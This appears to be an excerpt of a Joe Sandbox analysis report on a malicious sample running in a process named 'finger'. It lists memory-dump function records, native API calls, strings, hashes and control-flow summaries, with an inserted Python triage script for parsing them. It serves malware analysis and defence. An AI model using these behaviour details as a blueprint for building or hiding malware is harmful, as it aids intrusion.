                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                      • Opcode ID: 2711dff12c423492b2e905dca78af8a5eec1e2f94549aa42d2e7eb286643fe3a
                                                                                                                                      • Instruction ID: 18cc35eaef0803187d529dd810773b0c2ce1bd5bb8fbdacd283971f18ae7ef36
                                                                                                                                      • Opcode Fuzzy Hash: 2711dff12c423492b2e905dca78af8a5eec1e2f94549aa42d2e7eb286643fe3a
                                                                                                                                      • Instruction Fuzzy Hash: 2D510971E00645AEDB70DF5CC8909BFBBF8EF44200B448459F5D6D7685DA74EA40CB64
                                                                                                                                      Strings
                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01034787
                                                                                                                                      • ExecuteOptions, xrefs: 010346A0
                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01034655
                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01034725
                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010346FC
                                                                                                                                      • Execute=1, xrefs: 01034713
                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01034742
                                                                                                                                      • API ID: __aulldvrm
                                                                                                                                      • String ID: +$-$0$0
                                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                      • Instruction ID: 6c44e47c0227558fa0135fbb7b317a27bf42721255ea647c308b98f3dd0a8b1b
                                                                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                      • Instruction Fuzzy Hash: 3181B078E052498EFF6A8E6CC8507FEBBF1BF45320F184599D8E5A72D1C6348941CB51
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                                                      • API String ID: 48624451-2819853543
                                                                                                                                      • Opcode ID: b58fb7abef3ec2f2a3d942848ddb989efa355b0866427ccbf2f08fd21485f696
                                                                                                                                      • Instruction ID: 75264043d9a4463eddc4557cb08d60f75f446de758cd2bf67cf6cfa56ca68d1e
                                                                                                                                      • Opcode Fuzzy Hash: b58fb7abef3ec2f2a3d942848ddb989efa355b0866427ccbf2f08fd21485f696
                                                                                                                                      • Instruction Fuzzy Hash: 9921837AE00159ABDB11DE69DC50AEE7BF8EF64640F044156E985D3240EB30DA418BA5
                                                                                                                                      Strings
                                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010302BD
                                                                                                                                      • RTL: Re-Waiting, xrefs: 0103031E
                                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010302E7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                      • API String ID: 0-2474120054
                                                                                                                                      • Opcode ID: 0e58805b7aeb8ff1a7f0fe3e8509b8ac8cd352c646be1b58fc30f260cc5e9145
                                                                                                                                      • Instruction ID: ef6a604e7ab4560f4218aff1747d3c0a92555cb8bd0fbf6c9925eef672dd3641
                                                                                                                                      • Opcode Fuzzy Hash: 0e58805b7aeb8ff1a7f0fe3e8509b8ac8cd352c646be1b58fc30f260cc5e9145
                                                                                                                                      • Instruction Fuzzy Hash: D7E11F31608781DFE725CF29C884B2AB7E4BF84324F244A6DF5A58B2E1D774D948DB42
                                                                                                                                      Strings
                                                                                                                                      • RTL: Resource at %p, xrefs: 01037B8E
                                                                                                                                      • RTL: Re-Waiting, xrefs: 01037BAC
                                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01037B7F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                      • API String ID: 0-871070163
                                                                                                                                      • Opcode ID: b0d5a86375a29f5355b4b0d3cd222bf1959c06d8d59a5d71967f19431d279da8
                                                                                                                                      • Instruction ID: 27476df52279aa8aff63ef65da8458d5394de9dc0598ab449f12b5e021d13398
                                                                                                                                      • Opcode Fuzzy Hash: b0d5a86375a29f5355b4b0d3cd222bf1959c06d8d59a5d71967f19431d279da8
                                                                                                                                      • Instruction Fuzzy Hash: 8A4103757047078FD724DE29CC40BBAB7E5EF98720F100A2DEA969B2D0DB70E8059B91
                                                                                                                                      APIs
                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0103728C
                                                                                                                                      Strings
                                                                                                                                      • RTL: Resource at %p, xrefs: 010372A3
                                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01037294
                                                                                                                                      • RTL: Re-Waiting, xrefs: 010372C1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                                      • Opcode ID: 78aeea23f2d4286d89a7a519190ad93c5ceb4f3587675464131b272ce486ad34
                                                                                                                                      • Instruction ID: 0abac69ef90372cf548d948db0e7ba208ee89e911a4aa0d19b016ce736526c99
                                                                                                                                      • Opcode Fuzzy Hash: 78aeea23f2d4286d89a7a519190ad93c5ceb4f3587675464131b272ce486ad34
                                                                                                                                      • Instruction Fuzzy Hash: CB4115B2700207ABD721DE29CD41FAAB7E5FF95720F140619F995EB280DB31E8429BD1
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                      • String ID: %%%u$]:%u
                                                                                                                                      • API String ID: 48624451-3050659472
                                                                                                                                      • Opcode ID: 8b166357dd92d656e2d794242daa0dbeb1458795bea05dcedd46fb3c897f02d4
                                                                                                                                      • Instruction ID: 20e92ba812f11b00af39cab95c8695b200280503f25960ddb61cdadde9ed967e
                                                                                                                                      • Opcode Fuzzy Hash: 8b166357dd92d656e2d794242daa0dbeb1458795bea05dcedd46fb3c897f02d4
                                                                                                                                      • Instruction Fuzzy Hash: 0E318472E002199FDB60DF2DCC40BEEB7F8EB44610F454596E989E3240EB30EA448FA5
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __aulldvrm
                                                                                                                                      • String ID: +$-
                                                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                      • Instruction ID: 91d2dbbcd0ff77e6671774606ef1e8dceee0c42af4ec7a7f20c6b1c739fcdb04
                                                                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                      • Instruction Fuzzy Hash: 3B919F71E0021A9AFB66DF6DC8806BEBBE5BF44320F14855EE9D5A72C0D738AD408B51
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$@
                                                                                                                                      • API String ID: 0-1194432280
                                                                                                                                      • Opcode ID: 6f7802770f05c40b1f8bb79d49e287d5d3b4dc1a3112272311e7d0b145a08ed0
                                                                                                                                      • Instruction ID: 0cc0b27ac5471dc73205b24114511404568a09655431129280b83c5f8ba6190f
                                                                                                                                      • Opcode Fuzzy Hash: 6f7802770f05c40b1f8bb79d49e287d5d3b4dc1a3112272311e7d0b145a08ed0
                                                                                                                                      • Instruction Fuzzy Hash: E7812C72D002799BDB35CB94CD49BEEB7B4AB08710F0441EAEA49B7280D7755E84DFA0

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:2.6%
                                                                                                                                      Dynamic/Decrypted Code Coverage:4.1%
                                                                                                                                      Signature Coverage:2.2%
                                                                                                                                      Total number of Nodes:465
                                                                                                                                      Total number of Limit Nodes:77
execution_graph (rendered as an interactive call graph in the original report; the flat node/edge listing, written as `<id> <address> [resolved API name]` for nodes and `<id>-><id>` for edges, is not reproduced here and continues beyond this section). Addresses the graph labels with a resolved API call (summary nodes that repeat a callee's API name on a wrapper function are omitted):
• 9c991e NtClose
• 9c9c9b RtlFreeHeap
• 9c98dd NtDeleteFile
• 9cbaf0, 9c9c4b RtlAllocateHeap
• 9c9b0b NtAllocateVirtualMemory
• 9b4980, 9b7300 LdrLoadDll
• 9b856e SetErrorMode
• 9bf910 CoInitialize, 9bfa0b CoUninitialize
• 9c9d2b CreateProcessInternalW
• 9b11e1 PostThreadMessageW
• 9c3f80 Sleep
• 9c96bd NtCreateFile
• 9a9e1d CreateThread
• 9bcab3 FindFirstFileW, 9bcaf4 FindNextFileW, 9bcb06 FindClose
• 9b8778 GetFileAttributesW
• 3522ad0, 3522ba0, 3522c1f, 3522c60, 3522c70, 3522ca0, 3522d10, 3522dd0, 3522df0, 3522e80, 3522ee0, 3522f30, 3522fb0, 35235c0, 35239b0, 3524340, 3524650 LdrInitializeThunk
97017->97016 97018 9cb9d0 RtlFreeHeap 97017->97018 97019 9bdfc4 97018->97019 97019->97004 97021 9ba3dd 97020->97021 97024 9bdfe0 97021->97024 97023 9ba4e3 97023->97007 97025 9be004 97024->97025 97026 9be0ae 97025->97026 97027 9cb9d0 RtlFreeHeap 97025->97027 97026->97023 97027->97026 97028 9c1f20 97033 9c1f39 97028->97033 97029 9c1fc6 97030 9c1f81 97031 9cb9d0 RtlFreeHeap 97030->97031 97032 9c1f91 97031->97032 97033->97029 97033->97030 97034 9c1fc1 97033->97034 97035 9cb9d0 RtlFreeHeap 97034->97035 97035->97029 97036 9c1721 97037 9c1731 97036->97037 97049 9c9760 97037->97049 97039 9c1742 97040 9c1775 97039->97040 97041 9c1760 97039->97041 97043 9c98f0 NtClose 97040->97043 97042 9c98f0 NtClose 97041->97042 97044 9c1769 97042->97044 97046 9c177e 97043->97046 97045 9c17b5 97046->97045 97047 9cb9d0 RtlFreeHeap 97046->97047 97048 9c17a9 97047->97048 97050 9c9807 97049->97050 97052 9c978b 97049->97052 97051 9c981d NtReadFile 97050->97051 97051->97039 97052->97039

Control-flow Graph

Control-flow graph of the function at 009A9E40 (basic blocks 009A9E40-009AA284 through 009AA70A; the rendered graph and its executed / not-executed colouring are not recoverable from this page). The only call in the function body is to 009CB630 at 009AA685; every other edge is an intra-function branch or loop.
Memory Dump Source
• Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
Similarity
• API ID:
• String ID: !$!$$X$($,$.>$01$4$5\$8$8`$:$;?$<$=J$@$@=$B$D$E$FY$H$R$W$X$Z$]$] $_$b$b'$bJ$d$n[$wG$x^$yQ${$~$!$*$<$B$d
• API String ID: 0-4228383014
• Opcode ID: 45a2061ccf458dbdb3e9497b7190e0eed4afdd8156428e0b2063d0dcd1594317
• Instruction ID: b5f8204a16e1299d5ffb3f3b48c77b3834b68ccd2389ccb413388d8f4db7c015
• Opcode Fuzzy Hash: 45a2061ccf458dbdb3e9497b7190e0eed4afdd8156428e0b2063d0dcd1594317
• Instruction Fuzzy Hash: CF32AFB0D05628CBEB64CF44C9987DDBBB1BB56308F1085D9D1896B280CBB95EC9CF85
APIs
• FindFirstFileW.KERNELBASE(?,00000000), ref: 009BCAC4
• FindNextFileW.KERNELBASE(?,00000010), ref: 009BCAFF
• FindClose.KERNELBASE(?), ref: 009BCB0A
Memory Dump Source
• Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: 9f520c8eb43a31d38e7f5d8b0d0826a3e8044e161c1e792f69fe4c7a71f6a48c
• Instruction ID: f80fdd97f92f7aa780e80e2a80dd66571c52d58a94ebe0e2c2563d6c077e68ee
• Opcode Fuzzy Hash: 9f520c8eb43a31d38e7f5d8b0d0826a3e8044e161c1e792f69fe4c7a71f6a48c
• Instruction Fuzzy Hash: 4831A6B5A4030CBBDB20DB64CD86FEF77BCAF84714F104459B909A7191DA70AE84CBA1
APIs
• NtCreateFile.NTDLL(?,?,?,?,?,97C467A0,?,?,?,?,?), ref: 009C96EE
Memory Dump Source
• Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 3b72953985565114540f5d9b9afaf6d0dd9883191b30b95bf7fb6a1fe9d2f644
• Instruction ID: 7cf62c14c3c64938e784c9fb58661ff6bd822d9959eb862db0a9bbbb58db6383
• Opcode Fuzzy Hash: 3b72953985565114540f5d9b9afaf6d0dd9883191b30b95bf7fb6a1fe9d2f644
• Instruction Fuzzy Hash: F331D4B5A00248AFCB14DF98C881EEEB7F9EF8D314F108209F919A7340D770A911CBA5
APIs
• NtReadFile.NTDLL(?,?,?,?,?,97C467A0,?,?,?), ref: 009C9846
Memory Dump Source
• Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 02ef30ed1401b686cca2db6043f8bb476b0ffa679f0082c7a04b14c15aa9692e
• Instruction ID: 2dc619c2a0f5ae11a5be18e77e664320ae8088bc1e71f80946401720c7d1532d
• Opcode Fuzzy Hash: 02ef30ed1401b686cca2db6043f8bb476b0ffa679f0082c7a04b14c15aa9692e
• Instruction Fuzzy Hash: 6631E8B5A00248AFDB14DF98C881EDFBBF9EF8D314F108109F908A7240D770A911CBA5
APIs
• NtAllocateVirtualMemory.NTDLL(009B213E,?,009C83EF,00000000,00000004,97C467A0,?,?,?,?,?,009C83EF,009B213E), ref: 009C9B28
Memory Dump Source
• Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: 36eb2fd49f8f4dd0a814e016e2559ca72dd9badcf1e4fd20b6b9986feb012b3a
• Instruction ID: 8e731374466084f0702f66a89823a6ce987acdbb72ec74709352cbd397042edf
• Opcode Fuzzy Hash: 36eb2fd49f8f4dd0a814e016e2559ca72dd9badcf1e4fd20b6b9986feb012b3a
• Instruction Fuzzy Hash: CC21F9B5A00348AFDB14DF98DC81FAF77B9EB89710F008109F919A7240D770A911CBA6
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
• Opcode ID: 74e00cd2e70aced1ae344fc8a020418b5d94312c0693c0340a3b2fccb8910217
• Instruction ID: 4ea4fd41104062b952e9224b438f6f6cca92981166ed2e49d745229db690261f
• Opcode Fuzzy Hash: 74e00cd2e70aced1ae344fc8a020418b5d94312c0693c0340a3b2fccb8910217
• Instruction Fuzzy Hash: 69112175A00708BED620EB59CC42FAB77ACEF86714F108549F948A7281D7746905C7A6
APIs
• NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 009C9927
Memory Dump Source
• Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 1cd20186e759e6351d983e6f235037a090fb2e5414a9fe944c6e4cca1723c09b
• Instruction ID: 21c52cbf153cd482423932899713112e1f6e3f4161ddcd5b4a8a04ff52b3e0eb
• Opcode Fuzzy Hash: 1cd20186e759e6351d983e6f235037a090fb2e5414a9fe944c6e4cca1723c09b
• Instruction Fuzzy Hash: 0AE04F352002447BD210EA59DC41FAB775CDBC5714F008459FA18A7181C770B90086E5
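The per-function blocks above all share one shape: an "APIs" header, zero or more "• Name.MODULE(args), ref: addr" call lines, a "Source File: ..., Offset: X, based on PE: true/false" line and a "Similarity" record with an API ID. When a report has dozens of these, the question a triager actually wants answered is which native (Nt*/Zw*) calls are issued from a dump that Joe Sandbox could not tie to a PE image (the 009A0000 region here), and which blocks carry an API ID but no observed call line at all (the DeleteFile and InitializeThunk blocks). The script below is an added example written for this page, not part of the Joe Sandbox report or its tooling; the regular expressions are assumptions fitted to the line shapes visible on this page, and SAMPLE_LISTING is constructed from five of the entries above (it is not a report export).

```python
"""Triage helper for Joe Sandbox per-function API listings (added example)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: five entries copied from the listing on this page, with the
# page widgets removed. Not a real report export; the format is an assumption.
SAMPLE_LISTING = """\
APIs
• FindFirstFileW.KERNELBASE(?,00000000), ref: 009BCAC4
• FindNextFileW.KERNELBASE(?,00000010), ref: 009BCAFF
• FindClose.KERNELBASE(?), ref: 009BCB0A
Memory Dump Source
• Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
• API ID: Find$File$CloseFirstNext
APIs
• NtCreateFile.NTDLL(?,?,?,?,?,97C467A0,?,?,?,?,?), ref: 009C96EE
Memory Dump Source
• Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
• API ID: CreateFile
APIs
• NtAllocateVirtualMemory.NTDLL(009B213E,?,009C83EF,00000000,00000004,97C467A0,?,?,?,?,?,009C83EF,009B213E), ref: 009C9B28
Memory Dump Source
• Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
• API ID: AllocateMemoryVirtual
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
• API ID: DeleteFile
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
• API ID: InitializeThunk
"""

# Line shapes as they appear on this page (assumed; other report versions may differ).
API_RE = re.compile(r"^•\s*(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")
APIID_RE = re.compile(r"^•\s*API ID:\s*(?P<id>\S*)")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int  # address of the call site inside the dump


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    dump_offset: Optional[int] = None
    pe_backed: Optional[bool] = None
    api_id: str = ""


def parse_listing(text: str) -> List[FunctionRecord]:
    """Start a new record at every 'APIs' header and fill it from the lines that follow."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m.group("args").split(",") if m.group("args") else []
            current.calls.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
            continue
        m = SRC_RE.search(line)
        if m:
            current.dump_offset = int(m.group("offset"), 16)
            current.pe_backed = m.group("pe") == "true"
            continue
        m = APIID_RE.match(line)
        if m:
            current.api_id = m.group("id")
    return records


def direct_native_calls(records: List[FunctionRecord]) -> set:
    """Nt*/Zw* calls recorded in dumps the sandbox reported as 'based on PE: false'."""
    return {c.name for r in records if r.pe_backed is False
            for c in r.calls if c.module.upper() == "NTDLL" and c.name.startswith(("Nt", "Zw"))}


def refs_inside_dump(records: List[FunctionRecord]) -> List[tuple]:
    """Sanity check: a call site must not lie below the base of the dump it was attributed to."""
    return [(c.name, c.ref) for r in records for c in r.calls
            if r.dump_offset is None or c.ref < r.dump_offset]


def unresolved_records(records: List[FunctionRecord]) -> List[str]:
    """API IDs that came with no call line on the page: keep them as hints, not evidence."""
    return [r.api_id for r in records if r.api_id and not r.calls]


if __name__ == "__main__":
    recs = parse_listing(SAMPLE_LISTING)
    print("functions:", len(recs))
    print("native calls from non-PE-backed memory:", sorted(direct_native_calls(recs)))
    print("call sites outside their dump:", refs_inside_dump(recs))
    print("API IDs without an observed call line:", unresolved_records(recs))
```

Run against the five constructed entries, it reports NtCreateFile and NtAllocateVirtualMemory as native calls from the non-PE-backed 009A0000 dump, no call site below its dump base, and DeleteFile and InitializeThunk as IDs that arrived without a call line. The split between "observed call" and "ID only" matters because the second group is exactly where a report reader tends to over-claim.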
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
• Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 89d0d84c3f00920b72d717e6ca69ccd101b3c706bf09ae6793e5213d4ff46920
• Instruction ID: 469d14fc99dbc940281d031aa54c4ebbb9dbbd81929efb9d52158c5f6167a7f9
• Opcode Fuzzy Hash: 89d0d84c3f00920b72d717e6ca69ccd101b3c706bf09ae6793e5213d4ff46920
• Instruction Fuzzy Hash: D5900231705804129144B15858845464155A7E1311B59C011F4428555C8B148A5A6361
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
• Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 0b8a16f8d66b274948f33dba9a0a738a3facc1321fc13057b853f2308b98b7c5
• Instruction ID: b976afe009942d07ce61cd83bcdce67e9aa90f45134771cdf7aaecc06ba374b8
• Opcode Fuzzy Hash: 0b8a16f8d66b274948f33dba9a0a738a3facc1321fc13057b853f2308b98b7c5
• Instruction Fuzzy Hash: 8A900261701504424144B15858044066155A7E2311399C115B4558561C87188959A269
                                                                                                                                      APIs

                                                                                                                                      Control-flow Graph

                                                                                                                                      control_flow_graph 434 9b111d-9b1128 435 9b112a-9b112f 434->435 436 9b1118-9b1119 434->436 437 9b1101 435->437 438 9b1131-9b1143 435->438 439 9b1173-9b11da call 9cba70 call 9cc480 call 9b4920 call 9a1410 call 9c2060 437->439 440 9b1103-9b1109 437->440 441 9b1187-9b1190 call 9cc480 438->441 442 9b1145-9b114d 438->442 461 9b11fa-9b1200 439->461 462 9b11dc-9b11eb PostThreadMessageW 439->462 448 9b1191 441->448 444 9b116f-9b1171 442->444 445 9b114f-9b1151 442->445 444->439 449 9b115e-9b1164 445->449 450 9b1153 445->450 448->442 450->448 453 9b1155-9b115d 450->453 453->449 462->461 464 9b11ed-9b11f7 462->464 464->461
                                                                                                                                      APIs
                                                                                                                                      • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 009B11E7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                      • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                      • API String ID: 1836367815-3632291559
                                                                                                                                      • Opcode ID: 0081208f6dd57f68770a1c1c42c3083a2954b25e6953c5887d6391d41e5e1006
                                                                                                                                      • Instruction ID: 7d02aa3e0c962afa0ed4a7cec735d8660ea1b41fa31af960dde36991922cb245
                                                                                                                                      • Opcode Fuzzy Hash: 0081208f6dd57f68770a1c1c42c3083a2954b25e6953c5887d6391d41e5e1006
                                                                                                                                      • Instruction Fuzzy Hash: 6031C07294914D7FDB10DBA8AD91EEF7F6CEB413B4F408029FB44A7201E1254D028BE1

                                                                                                                                      Control-flow Graph

                                                                                                                                      control_flow_graph 465 9b10f2-9b1101 467 9b1173-9b11da call 9cba70 call 9cc480 call 9b4920 call 9a1410 call 9c2060 465->467 468 9b1103-9b1109 465->468 479 9b11fa-9b1200 467->479 480 9b11dc-9b11eb PostThreadMessageW 467->480 480->479 482 9b11ed-9b11f7 480->482 482->479
                                                                                                                                      APIs
                                                                                                                                      • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 009B11E7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessagePostThread
